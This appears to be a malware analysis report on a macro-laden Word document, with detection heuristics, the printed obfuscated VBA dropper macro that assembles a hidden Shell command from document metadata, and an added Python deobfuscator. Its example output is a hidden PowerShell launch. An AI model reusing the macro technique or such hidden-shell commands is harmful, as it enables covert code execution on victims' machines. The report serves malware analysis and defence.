Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a8b91fac4cdd922…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 80.0 KB
Created: 2017-10-10 15:18:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: ad5e86b1068b0906113e5af24b22ba98
SHA-1: 98010df0a368151f9d831d3e18e957137600d142
SHA-256: 5a8b91fac4cdd9220dae03dc4160d8d77fb509482d14370da38227b5de7ee639
Risk score: 212

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File

The sample is a malicious Word (OLE) document containing VBA macros. An AutoOpen macro calls a second routine that rebuilds a command string from several dozen Left/Right/Mid/Len slices of the document's Comments built-in property and passes it to VBA.Shell$ with window style 0 (vbHide, no visible window). The command line itself is therefore stored in document metadata rather than in the macro source, and the extracted VBA alone does not reveal it. A reference to PowerShell was found in the file, indicating the macro is designed to launch a hidden PowerShell command, likely to download and execute a secondary payload. The ClamAV detection Doc.Macro.DollarShell-6346616-0 further supports the malicious verdict.

Heuristics (8)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
    RzUZw = CoZOW + BpJpC + ZqZrnHsLvj + vnTpSnFfnL + zdTXN
    VBA.Shell$ RzUZw, 0
    End Sub
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
    End Sub
    Sub AutoOpen()
    OpwUzGpsi
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see Extracted artifacts), so the "no modern VBA project" wording of this generic description does not apply here; the marker is the AutoOpen name already reported above and adds no independent evidence.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection. See the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    The only URL found is the standard DrawingML XML namespace identifier that Office writes into documents. It is not a network indicator and should not be treated as a download location; the actual command line built by the macro lives in the Comments property, not in this URL.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8036 bytes
SHA-256: cbf36fd7a0e1d37337e08c537a4fdb629150fe4404a257de4ba34ae3f42542b2
Detection: ClamAV: No threats found
Obfuscation or payload: likely
46 of 78 identifiers look randomly generated (e.g. 'TWcBopNmQKL'), consistent with name-mangling obfuscation. The string-building pattern (dozens of Left/Right/Mid slices of the Comments property concatenated into a single Shell argument) is a further sign that the command line is stored outside the macro and must be recovered from document metadata.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub OpwUzGpsi()
WPDEKviRwz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7535), 45)
vsFPPsPsYG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1443), 69)
GjLDzAW = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18048), 8)
dvBNtm = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13233), 101)
NDUCXtsGz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 16318), 52)
PpSQzlw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5206, 186)
bRvbjjSwE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3371), 121)
GjOLDzQ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15005), 191)
TzCqFATLfE = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4401), 38)
KvCvHtVrbvC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15812), 61)
KfbHMAUPmQ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6284, 143)
FVjMHRz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 798), 191)
vnMPvDur = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7564), 189)
vFBvUsDS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18178, 34)
fYfYf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3063), 167)
piTiCWOO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1195, 172)
rRwaYX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17332, 18)
JEZLUDzvR = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2714), 176)
IoktfFMu = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18829), 127)
jmjddMBHhGB = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 18905), 75)
VwwdKQfGEU = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3934, 92)
aHXQUMdzp = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8070), 128)
tiqqznk = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14058), 28)
WwOvhcC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8693, 143)
miSouD = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4191), 137)
rNuXmAujF = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15415), 143)
ZhSUjWL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12926, 39)
bjrKzlCwzEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2290, 23)
UwXtzkwTPc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10477, 18)
DhTKlRjaM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 13956), 67)
VjXAzw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13455), 85)
HfoMW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4922, 103)
YbiZMHKbwE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12291), 15)
NnENZSoCJa = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4701, 110)
UhbZD = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15908), 185)
zNzsIwm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2351, 51)
KIbvO = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11730), 63)
NDSOuhu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9377), 52)
qdEifkYjklY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16910, 63)
wQncnrBzolI = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13630), 88)
WkAZQT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7187), 11)
EcIUJvO = WPDEKviRwz + vsFPPsPsYG + GjLDzAW + dvBNtm + NDUCXtsGz + PpSQzlw + bRvbjjSwE + GjOLDzQ + TzCqFATLfE + KvCvHtVrbvC + KfbHMAUPmQ + FVjMHRz + vnMPvDur + vFBvUsDS + fYfYf + piTiCWOO + rRwaYX + JEZLUDzvR + IoktfFMu + jmjddMBHhGB + VwwdKQfGEU + aHXQUMdzp + tiqqznk + WwOvhcC + miSouD + rNuXmAujF + ZhSUjWL + bjrKzlCwzEn + UwXtzkwTPc + DhTKlRjaM + VjXAzw + HfoMW + YbiZMHKbwE + NnENZSoCJa + UhbZD + zNzsIwm + KIbvO + NDSOuhu + qdEifkYjklY + wQncnrBzolI + WkAZQT
WQvuOa = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3679, 82)
ELzOBHiMScD = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17862), 152)
blKuajbHVAE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16573, 17)
wpwFP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14352, 198)
YNGTqaA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8143), 134)
dliDIvikAor = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16737, 108)
jKsIzJsQMN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7277, 93)
aNiqE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12725, 169)
oKsOaCtDK = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11387), 85)
bfKld = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11012), 161)
ibrtjQYz = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11814), 59)
hAuvpJUcr = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3870), 84)
FFFiEGl = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5035), 162)
pjiOWXqvib = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 366), 14)
zLVKRKlV = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2039), 141)
mzJcWl = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6010), 75)
KmwLswRf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8855, 186)
SZwQGqF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5462, 50)
XmwAfBjzj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9498, 124)
TWcBopNmQKL = EcIUJvO + WQvuOa + ELzOBHiMScD + blKuajbHVAE + wpwFP + YNGTqaA + dliDIvikAor + jKsIzJsQMN + aNiqE + oKsOaCtDK + bfKld + ibrtjQYz + hAuvpJUcr + FFFiEGl + pjiOWXqvib + zLVKRKlV + mzJcWl + KmwLswRf + SZwQGqF + XmwAfBjzj
fROqwzCK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6024, 66)
MiALhclV = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18663), 189)
mXZCuMDROd = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10067, 30)
CoZOW = TWcBopNmQKL + fROqwzCK + MiALhclV + mXZCuMDROd
BpJpC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6849), 140)
ZqZrnHsLvj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4821), 5)
vnTpSnFfnL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4182, 1)
zdTXN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9316, 1)
RzUZw = CoZOW + BpJpC + ZqZrnHsLvj + vnTpSnFfnL + zdTXN
VBA.Shell$ RzUZw, 0
End Sub
Sub AutoOpen()
OpwUzGpsi
End Sub
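The extracted Module1 never contains the command it launches; it slices it out of the Comments property at fixed offsets and concatenates the pieces. The following is an added example, not code from the analysis platform or from the sample: a small emulator for exactly the expression subset the macro uses (Left/Right/Mid/Len, '+' concatenation, integer '-', and ActiveDocument.BuiltInDocumentProperties("Comments")), which resolves every assignment statically and reports the string handed to Shell. The Comments text and the macro below are constructed to mirror the sample's shape with invented identifiers and offsets; the real Comments property is about 19 KB, but the three expression forms are the same. The load_from_doc helper assumes olefile and oletools are installed and that the property decodes as cp1252.

```python
"""Static deobfuscation of a VBA macro that rebuilds its Shell command from
Left/Right/Mid/Len slices of the document's Comments property (added example)."""
import re

# Constructed stand-in for the Comments property. Fragments sit at fixed 1-indexed
# offsets: "powershell" 14..23, " Get-Date" 34..42, " -nop -w" 47..54, " hidden -c" 57..66.
SAMPLE_COMMENTS = "Draft notes: powershell is fine;  Get-Date ok  -nop -wzz hidden -c end."

# Constructed macro in the same shape as the extracted Module1 (identifiers invented).
SAMPLE_MACRO = '''Attribute VB_Name = "Module1"

Sub WjQkzpL()
tHqvX = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 23), 10)
pZMwRo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 47, 8)
kLoBwe = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 56), 10)
yBNVxt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 42), 9)
gXHwwO = tHqvX + pZMwRo
dFRqzS = gXHwwO + kLoBwe + yBNVxt
VBA.Shell$ dFRqzS, 0
End Sub
Sub AutoOpen()
WjQkzpL
End Sub
'''

TOKEN_RE = re.compile(r'\s*(?:(\d+)|("[^"]*")|([A-Za-z_][\w.$]*)|([(),+\-]))')
ASSIGN_RE = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')
SHELL_RE = re.compile(r'^(?:VBA\.)?Shell\$?\s+(.+?)(?:,\s*\d+)?$')   # "Shell cmd, windowstyle"

# VBA string builtins with VBA semantics: Mid is 1-indexed, Right/Left clamp to the string.
VBA_FUNCS = {
    "Left": lambda s, n: s[:n],
    "Right": lambda s, n: s[max(len(s) - n, 0):],
    "Mid": lambda s, start, n=None: s[start - 1:] if n is None else s[start - 1:start - 1 + n],
    "Len": lambda s: len(s),
}


def tokenize(src):
    """Split one VBA expression into (kind, value) tokens."""
    tokens, pos, src = [], 0, src.strip()
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m:
            raise ValueError(f"cannot tokenize near {src[pos:pos + 20]!r}")
        num, string, ident, punct = m.groups()
        if num is not None:
            tokens.append(("num", int(num)))
        elif string is not None:
            tokens.append(("str", string[1:-1]))
        elif ident is not None:
            tokens.append(("ident", ident))
        else:
            tokens.append(("punct", punct))
        pos = m.end()
    return tokens


class MacroEmulator:
    """Resolves assignments line by line and records every argument given to Shell."""

    def __init__(self, props):
        self.props = props          # document metadata the macro reads, e.g. {"Comments": ...}
        self.vars = {}              # macro variables assigned so far
        self.shell_commands = []    # every command string handed to Shell

    def run(self, macro_source):
        for raw in macro_source.splitlines():
            line = raw.strip()
            if not line or line.split()[0] in ("Attribute", "Sub", "End"):
                continue
            if (m := ASSIGN_RE.match(line)):
                self.vars[m.group(1)] = self.evaluate(m.group(2))
            elif (m := SHELL_RE.match(line)):
                self.shell_commands.append(self.evaluate(m.group(1)))
            # bare procedure calls such as "WjQkzpL" carry no data flow and are ignored
        return self.shell_commands

    # --- recursive-descent parser: expr := term (('+'|'-') term)* ---
    def evaluate(self, expr_src):
        self._toks, self._i = tokenize(expr_src), 0
        value = self._expr()
        if self._i != len(self._toks):
            raise ValueError(f"trailing tokens in {expr_src!r}")
        return value

    def _peek(self):
        return self._toks[self._i] if self._i < len(self._toks) else (None, None)

    def _take(self, expected=None):
        tok = self._toks[self._i]
        self._i += 1
        if expected is not None and tok != ("punct", expected):
            raise ValueError(f"expected {expected!r}, got {tok[1]!r}")
        return tok

    def _expr(self):
        value = self._term()
        while self._peek() in (("punct", "+"), ("punct", "-")):
            op = self._take()[1]
            rhs = self._term()
            value = value + rhs if op == "+" else value - rhs   # '+' concatenates strings
        return value

    def _term(self):
        kind, val = self._take()
        if kind in ("num", "str"):
            return val
        if kind == "punct" and val == "(":
            value = self._expr()
            self._take(")")
            return value
        if kind != "ident":
            raise ValueError(f"unexpected token {val!r}")
        if self._peek() != ("punct", "("):
            return self.vars[val]                      # plain variable read
        self._take("(")
        args = [self._expr()]
        while self._peek() == ("punct", ","):
            self._take(",")
            args.append(self._expr())
        self._take(")")
        if val.endswith("BuiltInDocumentProperties"):
            return self.props[args[0]]                 # metadata lookup, e.g. "Comments"
        return VBA_FUNCS[val](*args)


def deobfuscate(macro_source, comments):
    """Return the Shell command line(s) the macro would launch, without running it."""
    return MacroEmulator({"Comments": comments}).run(macro_source)


def load_from_doc(path):
    """Pull the real inputs from a .doc: Comments via olefile, macro text via olevba.
    Assumes olefile and oletools are installed; not exercised by the constructed sample."""
    import olefile
    from oletools.olevba import VBA_Parser
    comments = olefile.OleFileIO(path).get_metadata().comments or b""
    if isinstance(comments, bytes):
        comments = comments.decode("cp1252", errors="replace")   # assumed code page
    macros = "\n".join(code for _, _, _, code in VBA_Parser(path).extract_macros())
    return macros, comments


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE_MACRO, SAMPLE_COMMENTS):
        print("Shell argument:", cmd)
```

On the constructed input the emulator yields `powershell -nop -w hidden -c Get-Date`. To apply it to the actual sample, call `deobfuscate(*load_from_doc("sample.doc"))` and hand the recovered command line to a PowerShell deobfuscation pass rather than executing it; the whole point of the slicing pattern is that neither olevba output nor a string search on the macro shows the command, so the Comments property is the artifact to carve and hash alongside macros.bas.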